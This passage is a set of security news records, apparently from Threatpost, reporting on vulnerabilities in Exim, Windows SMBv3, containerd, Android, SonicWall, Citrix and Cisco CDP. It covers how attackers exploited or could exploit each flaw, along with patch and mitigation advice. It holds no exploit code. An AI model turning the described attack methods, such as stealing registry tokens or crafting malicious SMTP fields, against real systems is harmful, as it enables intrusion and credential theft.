software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. The bug was patched last June.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe flaw can be exploited using a specially crafted email containing a modified \u201cMAIL FROM\u201d field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives.\n\nExim admins should update their MTAs to [version 4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-29T16:34:38", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "modified": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:14", "description": "The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.\n\nMicrosoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol \u2013 the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017. SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.\n\nIn this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\n\u201cAlthough Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,\u201d [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. \u201cCISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n\nThe author behind the PoC, who goes by \u201cChompie,\u201d announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.\n\n> This was a pain \ud83d\ude02. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>). [pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)\n> \n> \u2014 chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)\n\nThe PoC is notable because it achieves RCE \u2013 previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.\n\n\u201cWhile there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,\u201d said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie\u2019s exploit. \u201cThis is probably because remote kernel exploitation is very different from local exploitation in that an attacker can\u2019t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.\u201d\n\nWindows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.\n\n\u201cIn the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,\u201d the researchers explained. \u201cIn a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from \u2018physical\u2019 memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.\u201d\n\nTo protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can\u2019t patch. For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force. No reboot is necessary.\n\nTo protect unpatched SMB clients, Microsoft [noted that it\u2019s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).\n", "cvss3": {}, "published": "2020-06-08T15:54:41", "type": "threatpost", "title": "SMBGhost RCE Exploit Threatens Corporate Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-06-08T15:54:41", "id": "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "href": "https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-26T18:29:40", "description": "A security vulnerability can be exploited to coerce the containerd cloud platform into exposing the host\u2019s registry or users\u2019 cloud-account credentials.\n\nContainerd [bills itself](<https://containerd.io/>) as a runtime tool that \u201cmanages the complete container lifecycle of its host system, from image transfer and storage to container execution and supervision to low-level storage to network attachments and beyond.\u201d As such, it offers deep visibility into a user\u2019s cloud environment, across multiple vendors.\n\nThe bug (CVE-2020-15157) is located in the container image-pulling process, according to Gal Singer, researcher at Aqua. Adversaries can exploit this vulnerability by building dedicated container images designed to steal the host\u2019s token, then using the token to take over a cloud project, he explained.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA container image is a combination of a manifest file and some individual layer files,\u201d he wrote in a [recent post](<https://blog.aquasec.com/cve-2020-15157-containerd-container-vulnerability>). \u201cThe manifest file [in Image V2 Schema 2 format]\u2026can contain a \u2018foreign layer\u2019 which is pulled from a remote registry. When using containerd, if the remote registry responds with an HTTP 401 status code, along with specific HTTP headers, the host will send an authentication token that can be stolen.\u201d\n\nHe added, \u201cthe manifest supports an optional field for an external URL from which content may be fetched, and it can be any registry or domain.\u201d\n\nThe attackers can thus exploit the problem by crafting a malicious image in a remote registry, and then convincing the user to access it through containerd (this can be done through email and other social-engineering avenues), according to the [National Vulnerability Database writeup](<https://nvd.nist.gov/vuln/detail/CVE-2020-15157>).\n\n\u201cIf an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control, and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image,\u201d according to the bug advisory. \u201cIn some cases, this may be the user\u2019s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account.\u201d\n\n## **Non-Trivial Exploitation**\n\nResearcher Brad Geesaman at Darkbit, who did original research into the vulnerability (which he calls \u201cContainerDrip\u201d), put together a proof-of-concept (PoC) exploit for a related attack vector.\n\nOne of the hurdles for exploitation is the fact that containerd clients that pull images may be configured to authenticate to a remote registry in order to fetch private images, which would prevent it from accessing the malicious content. Instead, an attacker would need to place the tainted image into a remote registry that the user already authenticates to.\n\n\u201cThe question became: \u2018How do I get them to send their credentials to me [for remote-registry authentication]?'\u201d he said in [a posting](<https://darkbit.io/blog/cve-2020-15157-containerdrip>) earlier this month. \u201cAs it turns out, all you have to do is ask the right question.\u201d\n\nThe Google Kubernetes Engine (GKE) is a managed environment for running containerized applications, which can be integrated with containerd. When GKE clusters running COS_CONTAINERD and GKE 1.16 or below are given a deployment to run, a Basic Auth header shows up, which when base64 decoded, turns out to be the authentication token for the underlying Google Compute Engine, used to create virtual machines. This token is attached to the GKE cluster/nodepool.\n\n\u201cBy default in GKE, the [Google Cloud Platform] service account attached to the nodepool is the default compute service account and it is granted Project Editor,\u201d explained Geesaman.\n\nThat said, also by default, a function called GKE OAuth Scopes \u201cscopes down\u201d the available permissions of that token. Geesaman also found a workaround for that.\n\n\u201cIf the defaults were modified when creating the cluster to grant the [\u201cany\u201d] scope to the nodepool, this token would have no OAuth scope restrictions and would grant the full set of Project Editor IAM permissions in that GCP project,\u201d he explained.\n\nAnd from there, attackers can escalate privileges to \u201cProject Owner\u201d using a known attack vector [demonstrated at](<https://www.youtube.com/watch?v=Z-JFVJZ-HDA>) DEF CON 2020.\n\nHe added that the GKE path is one of many possible.\n\ncontainerd [patched](<https://github.com/containerd/containerd/releases/tag/v1.2.14>) the bug, which is listed as medium in severity, in version 1.2.4; containerd 1.3.x is not vulnerable.\n\nCloud security continues to be a challenge for organizations. Researchers earlier in October [disclosed two flaws](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in Microsoft\u2019s Azure web hosting application service, App Services, which if exploited could enable an attacker to take over administrative servers. Over the summer, malware like the Doki backdoor was [found to be infesting](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) Docker containers.\n\nIn April, a simple Docker container honeypot was [used in a lab test](<https://threatpost.com/poorly-secured-docker-image-rapid-attack/154874/>) to see just how quickly cybercriminals will move to compromise vulnerable cloud infrastructure. It was quickly attacked by four different criminal campaigns over the span of 24 hours.\n", "cvss3": {}, "published": "2020-10-26T17:12:13", "type": "threatpost", "title": "Containerd Bug Exposes Cloud Account Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15157", "CVE-2020-5135"], "modified": "2020-10-26T17:12:13", "id": "THREATPOST:39625C47309704502299C3CF93814CFA", "href": "https://threatpost.com/containerd-bug-cloud-account-credentials/160546/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:43", "description": "A critical privilege-escalation vulnerability affecting Android devices has been found that allows attackers to hijack any app on an infected phone \u2013 potentially exposing private SMS messages and photos, login credentials, GPS movements, phone conversations and more.\n\nThe bug is dubbed the \u201cStrandHogg 2.0\u201d vulnerability (CVE-2020-0096) by the Promon researchers who found it, due to its similarity to the [original StrandHogg bug](<https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/>) discovered last year. Like the original, a malicious app installed on a device can hide behind legitimate apps. When a normal app icon is clicked, a malicious overlay is instead executed, which can harvest login credentials for the legitimate app.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nHowever, Version 2.0 allows for a wider range of attacks. The main difference with the new bug is that exploits are carried out through reflection, \u201callowing malicious apps to freely assume the identity of legitimate apps while also remaining completely hidden,\u201d researchers explained, in [a white paper](<https://promon.co/strandhogg-2-0/>) published on Tuesday. The original StrandHogg allowed attacks via the TaskAffinity Android control setting.\n\n\u201cStrandHogg 2.0\u2026has learned how to, with the correct per-app tailored assets, dynamically attack nearly any app on a given device simultaneously at the touch of a button, unlike StrandHogg which can only attack apps one at a time,\u201d according to the research.\n\nAttackers would first inject the original launcher activity of the apps they are targeting with their own attack activity. The task will appear to be the original task belonging to the app; however, the attack activity that has been placed into the task is what the user will actually see when the task is activated.\n\n\u201cAs a result, the next time the app is invoked, for instance, by a user clicking its app icon, the Android OS will evaluate the existing tasks and find the task we created,\u201d according to the white paper. \u201cBecause it looks genuine to the app, it will bring the task we created to the foreground and with it our attack will now be activated.\u201d\n\nThe Promon researchers have published a proof-of-concept video of how an exploit would work:\n\n\u201cMobile apps practically have a target painted on their back. Promon\u2019s recent malware vulnerability discovery dubbed \u201cStrandHogg 2.0\u2033 is the latest example of what dangerous malware could do if exploited in the wild \u2013 possibly exposing Android users\u2019 mobile banking credentials and access one-time-passwords sent via SMS,\u201d said Sam Bakken, senior product marketing manager at OneSpan, via email.\n\nStrandHogg 2.0 attacks are also more difficult to detect, researchers wrote.\n\n\u201cAttackers exploiting StrandHogg have to explicitly and manually enter the apps they are targeting into Android Manifest, with this information then becoming visible within an XML file which contains a declaration of permissions, including what actions can be executed,\u201d they explained. \u201cThis declaration of required code, which can be found within the Google Play store, is not the case when exploiting StrandHogg 2.0.\u201d\n\nAttackers can further hide their activities due to the fact that StrandHogg 2.0 requires root access or external configuration, and code obtained from Google Play will not initially appear suspicious to developers and security teams.\n\nNo attacks have thus been seen in the wild, but researchers theorize that it\u2019s only a matter of time before they appear. Promon said that it expects threat actors to use both the original StrandHogg bug and the new version together, in order to broaden their attack surface: Many of the mitigations that can be executed against StrandHogg do not apply to StrandHogg 2.0 and vice-versa, Promon said.\n\n\u201cWe see StrandHogg 2.0 as StrandHogg\u2019s even more evil twin,\u201d said Tom Lysemose Hansen, CTO at Promon. \u201cAttackers looking to exploit StrandHogg 2.0 will likely already be aware of the original StrandHogg vulnerability and the concern is that, when used together it becomes a powerful attack tool for malicious actors.\u201d\n\nGoogle [has issued a patch](<https://threatpost.com/google-android-rce-bug-full-device-access/155460/>) for Android versions 9, 8.1 and 8, but users on earlier versions (representing 39.2 percent of Android devices, researchers said) will remain vulnerable. StrandHogg 2.0 exploits do not impact devices running Android 10, so users should update their devices to the latest firmware in order to protect themselves from attacks.\n\n\u201cWith a significant proportion of Android users reported to still be running older versions of the OS, a large percentage of the global population is still at risk,\u201d the researchers said.\n\nIn fact, according to data from Google, as of April 2020, 91.8 percent of Android active users worldwide are on version 9.0 or earlier: Pie (2018), Oreo (2017), Nougat (2016), Marshmallow (2015), Lollipop (2014), KitKat (2013), Jellybean (2012) and Ice Cream Sandwich (2011).\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-26T21:03:10", "type": "threatpost", "title": "StrandHogg 2.0 Critical Bug Allows Android App Hijacking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0096", "CVE-2020-5135"], "modified": "2020-05-26T21:03:10", "id": "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "href": "https://threatpost.com/strandhogg-2-critical-bug-android-app-hijacking/156058/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-23T17:55:37", "description": "UPDATE\n\nAn October patch [for a critical remote code execution (RCE) bug in a SonicWall VPN](<https://threatpost.com/critical-sonicwall-vpn-bug/160108/>) appliance turned out to be insufficient. While the patch closed the RCE attack vector, more than 800,000 devices were still vulnerable to an additional memory-leak flaw for months, according to researchers.\n\nSonicWall originally patched the stack-based buffer overflow vulnerability in the SonicWall Network Security Appliance (NSA), tracked as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>), back in October.\n\nHowever, Craig Young, a computer security researcher with Tripwire\u2019s Vulnerability and Exposures Research Team (VERT), said the initial patch for the vulnerability was \u201cbotched,\u201d needing a \u201cone- or two-line fix\u201d to be complete, he wrote in a [report](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) published Tuesday, which details the specifics of where the fix went wrong.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>)), not addressed by the initial October patch, is described in a security bulletin published Tuesday as, \u201cA vulnerability in SonicOS where the HTTP server response leaks partial memory by sending a crafted unauthenticated HTTP request. This can potentially lead to an internal sensitive data disclosure vulnerability.\u201d\n\nIn a statement from SonicWall sent to Threatpost it stated:\n\n_\u201cSonicWall is active in collaborating with third-party researchers, security vendors and forensic analysis firms to ensure its products meet or exceed expected security standards. Through the course of this practice, SonicWall was made aware of, verified, tested and patched a non-critical buffer overflow vulnerability that impacted versions of SonicOS. SonicWall is not aware of this vulnerability being exploited in the wild. As always, SonicWall strongly encourages organizations maintain patch diligence for all security products.\u201d _\n\nThe initial bug, with a CVSS severity rating of 9.4. The vulnerability highlighted by Tripwire has a medium CVSS severity rating of 5.3.\n\nThough SonicWall was aware of the problem soon after the fix was released, it only released a complete patch this week, Young wrote.\n\n\u201cI had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\u201d he wrote. \u201cI reconnected with their PSIRT [Product Security Incident Response Team] on March 1, 2021, for an update, but ultimately it took until well into June before an advisory could be released.\u201d\n\n## **Where It Went Wrong**\n\nYoung and Nikita Abramov, application analysis specialist at Positive Technologies (PT), were credited back in October with finding the flaw, which exists within the HTTP/HTTPS service used for product management and SSL VPN remote access.\n\nThe vulnerability could allow an unskilled attacker to trigger a persistent denial-of-service (DoS) condition using an unauthenticated HTTP request involving a custom protocol handler, as well as spread further damage, Young wrote in his [analysis](<https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/>) at the time.\n\nAbramov and Young both reported the bug to SonicWall around the same time in late September, and the company gave Young a date of Oct. 5 for a patch to resolve the problem. That date later was pushed up to Oct. 14, he said, which is when SonicWall also acknowledged to Threatpost that it had indeed issued a patch for the flaw.\n\nHowever, after the patch was released, Young tested a SonicWall VPN on Microsoft Azure to confirm how it responded to a proof-of-concept exploit he\u2019d devised for the flaw and found that it was still vulnerable. However, though it did not crash the system, the exploit payload did trigger a flood of binary data in response, he wrote, providing a screenshot of the result in his analysis.\n\n\u201cAs you can see from the screenshot, there are values in the binary data which certainly look like they could be memory addresses,\u201d Young wrote. \u201cAlthough I never observed recognizable text in the leaked memory, I believe this output could vary based on how the target system is used. I also suspect that the values in my output are in fact memory addresses which could be a useful information leak for exploiting an RCE bug.\u201d\n\nYoung\u2019s final assessment of his test was that the fix was incomplete, he said. \u201cThe unbounded string copy was replaced with an appropriate memory safe function, but the return value was not properly considered,\u201d he wrote.\n\n## **Delayed Security Advisory**\n\nYoung reported his findings to SonicWall PSIRT on Oct. 6 and followed up several times before receiving a response on Oct. 9 that \u201cconfirmed my expectation that this was the result of an improper fix for CVE-2020-5135, and told me that the patched firmware versions had already started to become available on mysonicwall.com as well as via Azure,\u201d he wrote.\n\nSix days later, Young said he received a response from the company that he would be informed when the memory-dump issue he identified was resolved and ready for release. He followed up again in March when he still had not heard back, he said.\n\nUltimately, it would take until this Wednesday, June 22, before SonicWall would publicly post [the advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) for the updated patch to the vulnerability, Young wrote.\n\nThe security advisory also patches a number of other bugs in SonicWall platforms, a complete list of which is available in both the company\u2019s post and Young\u2019s analysis.\n\n_(This article was updated on 6/23 at 12:30 p.m. ET to reflect additional reporting on a portion of a vulnerability not addressed by SonicWall\u2019s October patch. A clarification was also made to more clearly indicate that SonicWall\u2019s initial patch did mitigate the RCE bug. The article also includes a statement from SonicWall.) _\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-23T10:44:07", "type": "threatpost", "title": "SonicWall 'Botches' October Patch for VPN Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T10:44:07", "id": "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "href": "https://threatpost.com/sonicwall-botches-critical-vpn-bug/167152/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:27:01", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "cvss3": {}, "published": "2019-12-26T19:17:55", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:31:47", "description": "Researchers on Wednesday disclosed five critical vulnerabilities in Cisco Discovery Protocol (CDP), the Cisco Proprietary Layer 2 network protocol that is used to discover information about locally attached Cisco equipment.\n\nResearchers say that the vulnerabilities, which they collectively call CDPwn, can allow attackers to remotely take over millions of devices. The flaws specifically exist in the parsing of CDP packets, in the protocol implementation for various Cisco products, from its software to IP cameras. Cisco issued patches on Wednesday addressing the five flaws, and is urging users to update as soon as possible.\n\nThreatpost talked to Ben Seri, VP of Research at Armis, who discovered the flaws, about the CDPwn flaws, their impact, and why Layer 2 protocols are an under-researched area.\n\n**[Listen to the full podcast below, or download direct here](<http://traffic.libsyn.com/digitalunderground/cisco_flaw_podcast.mp3>).**\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/13028780/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly-edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell-Welch**: Hi, everyone, welcome back to the Threatpost podcast. You\u2019ve got Lindsey O\u2019Donnell-Welch with Threatpost here. And I\u2019m joined today by Ben Seri, the VP of research at Armis, to discuss some newly disclosed vulnerabilities that have been found in Cisco equipment. So Ben, thank you so much for joining.\n\n**Ben Seri: **Thank you.\n\n**LO: **So Armis discovered five vulnerabilities that were disclosed today. And those are stemming from the Cisco Discovery Protocol, aka CDP, which is the info sharing layer that maps all Cisco equipment on a network. And you guys collectively called these flaws CDPwn. So just to start, tell us some more deep in depth about what is the Cisco Discovery Protocol, just for some context here.\n\n**BS:** Sure. Yes, so Cisco makes network appliances. And so from time to time, they invent these protocols that are then used by every product that they produce. And CDP is one of these protocols. It\u2019s a Discovery Protocol, as you mentioned, it\u2019s simply a way for Cisco devices to find one another in a network. It\u2019s a protocol that works simply with multicast [frames], or what is called broadcast, packets that are sent in the clear, inside the network. And every device, Cisco device, sends packets from time to time saying, \u2018Hi, my IP address is this, My name is this, my operating system is this\u2019 and all kinds of information and they collect the Cisco devices\u2019 information about one another, about their neighbors. And then when you have all kinds of Cisco management products, you\u2019re able to view all the Cisco devices in your network. So it\u2019s mainly about convenience. There are not many functional features other than convenience related that use CDP. But it\u2019s nevertheless enabled by default on all of Cisco products, in some of their products you can\u2019t actually turn it off. It\u2019s something that just remains on all the time. And like any protocol it introduces an attack surface that might contain vulnerabilities, like the ones that we found in this occasion.\n\n**LO:** Right. And that\u2019s really interesting that this can\u2019t be turned off as a function in certain devices. And I know that in your research, you mentioned this is something that\u2019s implemented in virtually all Cisco products from switches to routers to IP phones and IP cameras. So can you speak a little bit about the threat attack surface here and the level of devices that could be impacted by this?\n\n**BS:** Yeah so CDP, one of its interesting aspects is that it\u2019s a layer 2 protocol. It\u2019s something that is just 